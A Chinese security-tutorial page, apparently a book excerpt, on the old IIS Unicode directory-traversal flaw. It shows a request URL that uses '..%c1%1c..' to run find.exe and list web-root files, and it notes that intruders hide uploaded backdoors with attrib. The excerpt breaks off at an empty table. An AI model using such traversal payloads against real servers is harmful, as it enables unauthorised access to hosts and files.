当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客攻防技术内幕-防止入侵的方法(13)

安全基础
黑客攻击行为的特征分析及反攻击技术
Windows 2000中隐患重重的十大“服务”
网页脚本攻击防范全攻略
防患于未然 轻松做好Windows 2000安全策略
用注册表为操作系统砌九堵安全墙
完善网站程序 脚本攻击防范策略完全篇
两步修改XP远程管理默认端口可防止入侵
消除Windows XP自身的安全隐患
保护Windows不受恶意代码攻击
如何关闭和限制电脑不用的端口
修改Windows 2000远程终端默认端口
操作系统被入侵后的修复过程
利用微软基准安全分析器打造你安全的系统
数字签名技术简介
检测和删除系统中的木马
QQ密码破解程序
P2P中保障Windows网络安全
在代码中查找安全性缺陷的专家提示
QQ安全的三大纪律八项注意
如何保证文件夹的绝对安全

安全基础 中的 黑客攻防技术内幕-防止入侵的方法(13)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 94 ::
收藏到网摘: n/a

6.9 UNICODE漏洞入侵(2)

    

6. 显示某一路径下相同文件类型的文件

如果要显示dInetpub\scripts\wwwroot下的相同文件类型,可在浏览器的地址栏中输入如下内容:

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/find.exe?/n+/v+""+d:\inetpub\wwwroot\*.ht*

如图6-71所示。

6-71  显示dInetpub\scripts\wwwroot下的相同文件类型

7. attrib命令

显示或更改文件属性的命令。该命令显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。入侵者有时会上传一些后门程序,并用该命令将其隐藏起来。具体参数如表6-1所示。

   6-1  attrib参数

   

%2br